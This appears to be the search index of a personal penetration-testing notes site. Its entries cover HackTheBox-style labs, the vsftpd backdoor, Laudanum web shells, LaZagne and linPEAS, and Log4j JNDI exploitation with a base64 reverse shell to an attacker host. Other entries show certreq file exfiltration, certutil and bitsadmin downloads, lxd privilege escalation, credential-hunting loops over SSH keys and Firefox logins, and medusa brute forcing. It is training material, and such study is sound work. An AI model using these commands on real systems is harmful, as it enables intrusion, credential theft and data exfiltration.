    msf > search vsftpd\u00a0\nmsf> use exploit/unix/ftp/vsftpd_234_backdoor\nmsf exploit/unix/ftp/vsftpd_234_backdoor> \u00a0 set RHOSTS 192.69.228.3\nmsf exploit/unix/ftp/vsftpd_234_backdoor> exploit\n\n# Sometimes, the exploit fails the first time. If that happens then please run the exploit again.\n\n$> id\n# you are root.\n
    1. Print the flag
    $> cat /root/flag.txt\n# 58c7c29a8ab5e7c4c06256b954947f9a\n
    ","tags":["pentesting"]},{"location":"laudanum/","title":"Laudanum: Injectable Web Exploit Code","text":"

    Laudanum is a repository of ready-made files that can be used to inject onto a victim and receive back access via a reverse shell, run commands on the victim host right from the browser, and more. The repo includes injectable files for many different web application languages to include asp, aspx, jsp, php, and more.

    ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#installation","title":"Installation","text":"

    Pre-built in Kali.

    Download from github repo: https://github.com/jbarcia/Web-Shells/tree/master/laudanum.

    ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#basic-usage","title":"Basic usage","text":"

    The Laudanum files can be found in the /usr/share/webshells/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you must edit the file first to insert your attacking host IP address

    locate laudanum\n
    ","tags":["pentesting","web pentesting","web shells"]},{"location":"lazagne/","title":"Lazagne","text":"

    The\u00a0LaZagne project\u00a0is an open source application used to\u00a0retrieve lots of passwords\u00a0stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

    ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/AlessandroZ/LaZagne.

    Download a standalone copy from https://github.com/AlessandroZ/LaZagne/releases/.

    ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#basic-usage","title":"Basic usage","text":"

    Once Lazagne.exe is on the target, we can open command prompt or PowerShell, navigate to the directory the file was uploaded to, and execute the following command:

    C:\\Users\\username\\Desktop> start lazagne.exe all\n# -vv: to study what it is doing in the background.\n
    ","tags":["pentesting","web pentesting","passwords"]},{"location":"linenum/","title":"LinEnum - A tool to scan Linux system","text":"","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#installation","title":"Installation","text":"

    Clone github repo: https://github.com/rebootuser/LinEnum

    ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#basic-usage","title":"Basic usage","text":"
    ./LinEnum.sh -s-r report -e /tmp/ -t\n# -k: Enter keyword\n# -e: Enter export location\n# -t: Include thorough (lengthy) tests\n# -s: Supply current user password to check sudo perms (INSECURE)\n# -r Enter report name\n
    ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linpeas/","title":"linPEAS","text":"

    LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linpeas/#installation","title":"Installation","text":"

    Github repo: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS.

    Some interesting features is that you can execute from memory and send output back to the host.

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/","title":"Linux Exploit Suggester","text":"

    Linux Exploit Suggester does pretty much what its name says: it helps in detecting security deficencies for given Linux kernel/Linux-based machine.

    ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#installation","title":"Installation","text":"

    Download from https://github.com/The-Z-Labs/linux-exploit-suggester.

    You can also download it from and to the victim's machine with a different name, let's say \"les.sh\":

    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh\n
    ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#basic-commands","title":"Basic commands","text":"

    Execute it making sure of having execution permissions first:

    ./linux-exploit-suggester.sh\n

    Also, a nice way to serve this payload is copying the file into the folder /var/www/html of the attacker machine and then run:

    service apache2 start\n
    ","tags":["pentesting","privilege escalation"]},{"location":"linux-privilege-checker/","title":"Linux Privilege Checker","text":"

    Linux privilege checker is an enumeration tool with privilege escalation checking capabilities.

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#installation","title":"Installation","text":"

    Download from: http://www.securitysift.com/download/linuxprivchecker.py

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#basic-commands","title":"Basic commands","text":"

    You can run it on your system by typing:

     ./linuxprivchecker.py \n

    or

    python linuxprivchecker.py\n

    Also, a nice way to serve this payload is copying this python file into /var/www/html and then run:

    service apache2 start\n
    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux/","title":"Linux","text":"","tags":["linux"]},{"location":"linux/#find-sensitive-files","title":"Find sensitive files","text":"","tags":["linux"]},{"location":"linux/#configuration-files","title":"Configuration files","text":"
    # Return files with extension .conf, .config and .cnf, which in linux are configuration files.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n\n# Search for three words (user, password, pass) in each file with the file extension .cnf.\nfor i in $(find / -name *.cnf 2>/dev/null | grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null | grep -v \"\\#\";done\n
    ","tags":["linux"]},{"location":"linux/#databases","title":"Databases","text":"
    # Search for databases\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n
    ","tags":["linux"]},{"location":"linux/#scripts","title":"Scripts","text":"
    for l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\";done\n
    ","tags":["linux"]},{"location":"linux/#files-including-the-txt-file-extension-and-files-that-have-no-file-extension-at-all","title":"Files including the .txt file extension and files that have no file extension at all","text":"

    Admin may change the name of configuration files. But you can try to find them:

    find /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n
    ","tags":["linux"]},{"location":"linux/#cronjobs","title":"cronjobs","text":"

    These are divided into the system-wide area (/etc/crontab) and user-dependent executions. Some applications and scripts require credentials to run and are therefore incorrectly entered in the cronjobs. Furthermore, there are the areas that are divided into different time ranges (/etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly, /etc/cron.weekly). The scripts and files used by cron can also be found in /etc/cron.d/ for Debian-based distributions.

    ","tags":["linux"]},{"location":"linux/#ssh-keys","title":"SSH Keys","text":"
    grep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null | grep \":1\"\n\ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null | grep \":1\"\n
    ","tags":["linux"]},{"location":"linux/#bash-history","title":"Bash History","text":"
    tail -n5 /home/*/.bash*\n
    ","tags":["linux"]},{"location":"linux/#logs","title":"Logs","text":"Log File Description /var/log/messages Generic system activity logs. /var/log/syslog Generic system activity logs. /var/log/auth.log (Debian) All authentication related logs. /var/log/secure (RedHat/CentOS) All authentication related logs. /var/log/boot.log Booting information. /var/log/dmesg Hardware and drivers related information and logs. /var/log/kern.log Kernel related warnings, errors and logs. /var/log/faillog Failed login attempts. /var/log/cron Information related to cron jobs. /var/log/mail.log All mail server related logs. /var/log/httpd All Apache related logs. /var/log/mysqld.log All MySQL server related logs.
     for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null); if [[ $GREP ]];then echo -e \"\\n#### Log file: \" $i; grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null;fi;done\n
    ","tags":["linux"]},{"location":"linux/#credentials-storage","title":"Credentials storage","text":"","tags":["linux"]},{"location":"linux/#shadow-file","title":"Shadow file","text":"

    The /etc/shadow file has a unique format in which the entries are entered and saved when new users are created.

    htb-student:    $y$j9T$3QSBB6CbHEu...SNIP...f8Ms:   18955:  0:  99999:  7:  :   :   :\n<username>:     <encrypted password>:   <day of last change>:   <min age>:  <max age>:  <warning period>:   <inactivity period>:    <expiration date>:  <reserved field>\n

    The encryption of the password in this file is formatted as follows:

    $ <id>$ <salt>$ <hashed>$ y$ j9T$ 3QSBB6CbHEu...SNIP...f8Ms

    The type (id) is the cryptographic hash method used to encrypt the password. Many different cryptographic hash methods were used in the past and are still used by some systems today.

    ID Cryptographic Hash Algorithm $1$ MD5 $2a$ Blowfish $5$ SHA-256 $6$ SHA-512 $sha1$ SHA1crypt $y$ Yescrypt $gy$ Gost-yescrypt $7$ Scrypt

    The /etc/shadow file can only be read by the user root.

    ","tags":["linux"]},{"location":"linux/#passwd-file","title":"Passwd file","text":"

    The /etc/passwd

    htb-student:    x:  1000:   1000:   ,,,:    /home/htb-student:  /bin/bash\n<username>:     <password>:     <uid>:  <gid>:  <comment>:  <home directory>:   <cmd executed after logging in>\n

    The x in the password field indicates that the encrypted password is in the /etc/shadow file.

    ","tags":["linux"]},{"location":"linux/#opasswd","title":"Opasswd","text":"

    The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd. Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.

    # Reading /etc/security/opasswd\nsudo cat /etc/security/opasswd\n\n# cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1\n

    Looking at the contents of this file, we can see that it contains several entries for the user cry0l1t3, separated by a comma (,). Another critical point to pay attention to is the hashing type that has been used. This is because the MD5 ($1$) algorithm is much easier to crack than SHA-512. This is especially important for identifying old passwords and maybe even their pattern because they are often used across several services or applications. We increase the probability of guessing the correct password many times over based on its pattern.

    ","tags":["linux"]},{"location":"linux/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

    mimipenguin lazagne

    Firefox stored credentials:

    ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

    The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.

    ","tags":["linux"]},{"location":"log4j/","title":"Log4j","text":"

    This Log4J vulnerability can be exploited by injecting operating system commands (OS Command Injection). Log4j is a popular logging library for Java created in 2001. The logging library's main purpose is to provide developers with a way to change the format and verbosity of logging through configuration files versus code.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#what-it-does","title":"What it does","text":"

    What a logging library does, is instead of using print statements, the developer just uses a wrapper around the Logging class or object. So instead of using print(line), the code would look like this:

    logging.INFO(\u201cApplication Started\u201d)\nlogging.WARN(\u201cFile Uploaded\u201d)\nlogging.DEBUG(\u201cSQL Query Ran\u201d)\n

    Then the application has a configuration file which says what log levels (INFO, WARN, DEBUG, etc.) to display. This way when there is a problem with the application, the developer can enable DEBUG mode and instantly get the messages they need to identify the issue.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#reconnaissance-proof-of-concept","title":"Reconnaissance - Proof of Concept","text":"

    The main way people have been testing if an application is vulnerable is by combining this vulnerability with JNDI.

    Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS). By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.

    In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading.

    LDAP is the acronym forLightweight Directory Access Protocol, which is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389.

    Proof of concepts to see if it is vulnerable:

    1. Grab the request with the injectable parameter.

    2. In the injectable parameter, inject something like this:

    \"${jndi:ldap://AtackerIP/whatever}\"\n

    With tcpdump, check if the request with the payload produces some traffic to your attacker machine:

    sudo tcpdump -i tun0 port 389\n# -i: Select interface\n# port: indicate the port where traffic is going to be captured. \n

    The tcpdump output shows a connection being received on our machine. This proves that the application is indeed vulnerable since it is trying to connect back to us on the LDAP port 389.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#exploitation","title":"Exploitation","text":"
    # Install Open-JDK and Maven as requirement\nsudo apt install openjdk-11-jre maven\n\ngit clone https://github.com/veracode-research/rogue-jndi \n\ncd rogue-jndi\n\nmvn package\n\n# Once it's build, make a reverse shell in base64 with attacker machine and listening port\necho 'bash -c bash -i >&/dev/tcp/AtackerIP/AtackerPort 0>&1' | base64\n# This will return something similar to this: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of rogue-jndi folder and\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the bash command, copy paste your reverse shell in base64\n# --hostname: Victim IP\n\n# Now, open a terminal, launch [[netcat]] abd the listening port you defined in your payload.\n

    With Burpsuite, get a request for login:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

    This request is from HackTheBox machine: Unified. As we can read from the Unifi version exploit, the injectable parameter is \"remember\". So we insert there our payload and with Repeater, send the request:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

    Once we send that request, our jndi server will resend the reverse shell:

    And in our terminal with the nc listener we will get the reverse shell.

    The misinterpretation of the User-Agent leads to a JNDI lookup which is executed as a command from the system with administrator privileges and queries a remote server controlled by the attacker, which in our case is the\u00a0Destination\u00a0in our concept of attacks. This query requests a Java class created by the attacker and is manipulated for its own purposes. The queried Java code inside the manipulated Java class gets executed in the same process, leading to a remote code execution (RCE) vulnerability. GovCERT.ch has created an excellent graphical representation of the Log4j vulnerability worth examining in detail. Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#related-labs","title":"Related labs","text":"

    Walkthrough HackTheBox machine: Unified.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"lolbins-lolbas-gtfobins/","title":"LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins","text":"

    The term LOLBins (Living off the Land binaries) came from a Twitter discussion on what to call binaries that an attacker can use to perform actions beyond their original purpose. There are currently two websites that aggregate information on Living off the Land binaries:

    • LOLBAS Project for Windows Binaries
    • GTFOBins for Linux Binaries
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#windows-lolbas","title":"Windows - LOLBAS","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#certreqexe","title":"CertReq.exe","text":"

    Let's use CertReq.exe as an example.

    # From the victim's machine we can sec for instance file.txt to our kali\ncertreq.exe -Post -config http://$ipKali c:\\folder\\file.txt\n\n# From the kali machine, the attacking one, we use a netcat session\nsudo nc -lvnp 80\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#linux-gtfobins","title":"Linux - GTFOBins","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#openssl","title":"OpenSSL","text":"
    # Create Certificate in our attacker machine\nopenssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n\n# Stand up the Server in our attacker machine\nopenssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh\n\n# Download File to the victim's Machine, but run command from the attacker kali\nopenssl s_client -connect $ipVictim:80 -quiet > LinEnum.sh\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#other-common-living-off-the-land-tools","title":"Other Common Living off the Land tools","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#bitsadmin-download-function","title":"Bitsadmin Download function","text":"

    The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It \"intelligently\" checks host and network utilization into account to minimize the impact on a user's foreground work.

    # File Download with Bitsadmin\nbitsadmin /transfer wcb /priority foreground http://$ip:8000/nc.exe C:\\Users\\htb-student\\Desktop\\nc.exe\n

    PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.

    # Download\nImport-Module bitstransfer; Start-BitsTransfer -Source \"http://$ip/nc.exe\" -Destination \"C:\\Temp\\nc.exe\"\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#download-a-file-with-certutil","title":"Download a File with Certutil","text":"

    Certutil can be used to download arbitrary files.

    certutil.exe -verifyctl -split -f http://$ip/nc.exe\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lxd/","title":"lxd","text":"

    LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.

    A member of the local \u201clxd\u201d group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

    Source: https://www.hackingarticles.in/lxd-privilege-escalation/. In this article, you can find a good explanation about how lxc works. Original source: https://bugs.launchpad.net/ubuntu/+source/lxd/+bug/1829071.

    ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#privileges-escalation","title":"Privileges escalation","text":"

    Privilege escalation through lxd requires the access of local account and that that local account belongs to the group lxd.

    In order to take escalate the root privilege of the host machine you have to create an imag for lxd thus you need to perform the following the action:

    Steps to be performed on the attacker machine:

    # Download build-alpine in your local machine through the git repository:\ngit clone https://github.com/saghul/lxd-alpine-builder.git\n\n# Execute the script \u201cbuild -alpine\u201d that will build the latest Alpine image as a compressed file, this step must be executed by the root user.\ncd lxd-alpine-builder\nsudo ./build-alpine\n\n# This will generate a tar file that you need to transfer to the victim machine. For that you can copy that file to your /var/www/html folder and start apache2 service.\n

    Steps to be performed on the victim machine:

    # Download the alpine image. Go for instance to the /tmp folder and, if you have started the apache2 service in the attacker machine, do a wget:\nwget http://AtackerIP//alpine-v3.17-x86_64-20230508_0532.tar.gz\n\n# After the image is built it can be added as an image to LXD as follows:\nlxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage\n\n# List available images:\nlxc image list\n\n# Initiate your image inside a new container\nlxc init myimage ignite -c security.privileged=true\n\n# Mount the container inside the /root directory\nlxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true\n\n# Initialize the container\nlxc start ignite\n\n# Launch a shell command in the container\nlxc exec ignite /bin/sh\n
    ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#related-labs","title":"Related labs","text":"

    HackTheBox machine Included.

    ","tags":["privilege escalation","linux","lxd"]},{"location":"m365-cli/","title":"M365 CLI","text":"","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#installation","title":"Installation","text":"

    Source: https://pnp.github.io/cli-microsoft365/cmd/docs/

    Install m365 cli from: https://github.com/pnp/cli-microsoft365

    Login into Microsoft:

    m365 login  \n

    You will be prompted to open a browser with this url https://microsoft.com/devicelogin Enter the code that prompt message indicates and login as m365 user.

    ","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#ennumeration-techniques","title":"Ennumeration techniques","text":"

    Get information about the default Power Apps environment.

    m365 pa environment get  \n

    List Microsoft Power Apps environments in the current tenant

    m365 pa environment list \n

    List all available apps for that user

    m365 pa app list  \n

    List all apps in an environment as Admin

    m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Remove an app

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

    Removes the specified Power App without confirmation

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

    Removes the specified Power App you don't own

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default- 00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Add an owner without removing the old one

    m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

    Export an app

    m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
    ","tags":["Microsoft 365","pentesting"]},{"location":"machines/","title":"Machines and lab resources","text":"machine OWASP Juice Shop Is a modern vulnerable web application written in Node.js, Express, and Angular which showcases the entire\u00a0OWASP Top Ten\u00a0along with many other real-world application security flaws. Metasploitable 2 Is a purposefully vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated, and manual exploitation. Metasploitable 3 Is a template for building a vulnerable Windows VM configured with a wide range of\u00a0vulnerabilities. DVWA This is a vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities with varying degrees of difficulty. VAPI vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises. https://overthewire.org/wargames/ The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Linux https://underthewire.tech/wargames The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Windows

    Pro Lab has a specific scenario and level of difficulty:

    Lab Scenario Dante Beginner-friendly to learn common pentesting techniques and methodologies, common pentesting tools, and common vulnerabilities. Offshore Active Directory lab that simulates a real-world corporate network. Cybernetics Simulates a fully-upgraded and up-to-date Active Directory network environment, which is hardened against attacks. It is aimed at experienced penetration testers and Red Teamers. RastaLabs Red Team simulation environment, featuring a combination of attacking misconfigurations and simulated users. APTLabs This lab simulates a targeted attack by an external threat agent against an MSP (Managed Service Provider) and is the most advanced Pro Lab offered at this time."},{"location":"mariadb/","title":"MariaDB","text":"

    MariaDB is an open source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by MariaDB Foundation and initially released on 29 October 2009. MariaDB has a significantly high number of new features, which makes it better in terms of performance and user-orientation than MySQL.

    ","tags":["database","relational database","SQL"]},{"location":"mariadb/#basic-commands","title":"Basic commands","text":"
    # Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n
    ","tags":["database","relational database","SQL"]},{"location":"mariadb/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
    # -h host/ip   \n# -u user As default mariadb has a root user with no authentication\nmariadb -h <host/IP> -u root\n
    ","tags":["database","relational database","SQL"]},{"location":"markdown/","title":"Markdown","text":"","tags":["tool","language"]},{"location":"markdown/#titles-code","title":"Titles: code","text":"
    # H1\n
    ## H2\n
    ### H3\n
    ","tags":["tool","language"]},{"location":"markdown/#formating-the-text","title":"Formating the text","text":"
    *italic*   \n
    **bold**\n
    ==highlight==\n
    ","tags":["tool","language"]},{"location":"markdown/#blockquote-code","title":"Blockquote code","text":"
    > blockquote\n
    ","tags":["tool","language"]},{"location":"markdown/#lists","title":"Lists","text":"

    Bullets

    + One bullet\n+ Second Bullet\n+ Third bullet\n

    Ordered lists

    1. First item in list\n2. Second item in list\n

    Item list

    - First item\n- Second item\n- Third item\n
    ","tags":["tool","language"]},{"location":"markdown/#horizontal-rule","title":"Horizontal rule","text":"
    --- \n
    ","tags":["tool","language"]},{"location":"markdown/#links","title":"Links","text":"
    [link](https://www.example.com)\n
    ","tags":["tool","language"]},{"location":"markdown/#image-code","title":"Image: code","text":"
    ![alt text](image.jpg)\n
    ","tags":["tool","language"]},{"location":"markdown/#tables","title":"Tables","text":"
    | ColumnName | ColumnName |\n| ---------- | ---------- |\n| Content | Content that you want |\n
    ","tags":["tool","language"]},{"location":"markdown/#footnote-code","title":"Footnote: code","text":"
    Here's a sentence with a footnote. [^1]\n\n[^1]: This is the footnote. \n
    ","tags":["tool","language"]},{"location":"markdown/#task-list","title":"Task list","text":"
    - [x] Write the press release\n- [ ] Update the website\n- [ ] Contact the media \n
    ","tags":["tool","language"]},{"location":"markdown/#fenced-coded-block-code","title":"Fenced coded block: code","text":"
    \\```\ncode inside\n\\```\n
    ","tags":["tool","language"]},{"location":"markdown/#strikethrough","title":"Strikethrough","text":"
    ~~Love is flat.~~ \n
    ","tags":["tool","language"]},{"location":"markdown/#emojis","title":"Emojis","text":"
    :emoji-code: \n
    ","tags":["tool","language"]},{"location":"masscan/","title":"masscan - An IP scanner","text":"

    Masscan was designed to deal with large networks and to scan thousands of Ip addresses at once. It\u2019s faster than nmap but probably less accurate.

    ","tags":["reconnaissance","scanning"]},{"location":"masscan/#installation","title":"Installation","text":"
    sudo apt-get install git gcc make libpcap-dev\ngit clone https://github.com/robertdavidgraham/masscan\ncd masscan/\nmake\n

    \"make\" puts the program in the masscan/bin subdirectory. To install it (on Linux) run:

    make install\n

    The source consists of a lot of small files, so building goes a lot faster by using the multi-threaded build. This requires more than 2gigs on a Raspberry Pi (and breaks), so you might use a smaller number, like -j4 rather than all possible threads.

    make -j\n

    Make sure that is running properly:

    cd bin\n./masscan --regress\n
    ","tags":["reconnaissance","scanning"]},{"location":"masscan/#usage","title":"Usage","text":"

    Usage is similar to nmap. To scan a network segment for some ports:

    ./masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 10.0.2.1/24 -e tcp0 --router-ip 10.0.2.456  --echo >  masscan.conf\n# To see the complete list of options, use the `--echo` feature. This dumps the current configuration and exits. This output can be used as input back into the program:\n

    Another example:

    masscan -p80,8000-8100 10.0.0.0/8 2603:3001:2d00:da00::/112\n# This will scan the `10.x.x.x` subnet, and `2603:3001:2d00:da00::x` subnets\n# Scan port 80 and the range 8000 to 8100, or 102 ports total, on both subnets\n# Print output to `<stdout>` that can be redirected to a file\n
    ","tags":["reconnaissance","scanning"]},{"location":"masscan/#editing-config-file","title":"Editing config file","text":"
    nano masscan.conf\n# here, you add:  output-filename = scan.list //also json, xml\n

    Now to tun it again using the configuration file:

    masscan -c masscan.conf\n
    ","tags":["reconnaissance","scanning"]},{"location":"medusa/","title":"Medusa","text":"

    Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#installation","title":"Installation","text":"

    Pre-installed in Kali.

    wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz\n./configure\nmake\nmake install\n
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#basic-usage","title":"Basic usage","text":"
    # Brute force FTP logging\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp -n 2121\n# -u: username\n# -U: list of Usernames\n# -p: password\n# -P: list of passwords\n# -h: host /IP\n# -M: protocol to bruteforce\n# -n: for a different non-default port. For instance, port 2121 for ftp \n
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"metasploit/","title":"metasploit","text":"

    Developed in ruby by rapid7. \"Free\" edition preinstalled in Kali at /usr/share/metasploit-framework

    ","tags":["pentesting"]},{"location":"metasploit/#run-metasploit","title":"Run metasploit","text":"
    # start the postgresql service\nservice postgresql start \n\n# Initiate database\nsudo msfdb init\u00a0\n\n# Launch metasploit from terminal. -q means without banner\nmsfconsole -q\u00a0 \n
    ","tags":["pentesting"]},{"location":"metasploit/#update-metasploit","title":"Update metasploit","text":"

    How to update metasploit database, since msfupdate is deprecated.

    # Update the whole system\napt update && apt-upgrade -y \u00a0 \n\n# Update libraries and dependencies\napt dist-upgrade\n\n# Reinstall the app\napt install metasploit-framework \n
    ","tags":["pentesting"]},{"location":"metasploit/#basic-commands","title":"Basic commands","text":"
    # Help information\nshow -h\u00a0 \n
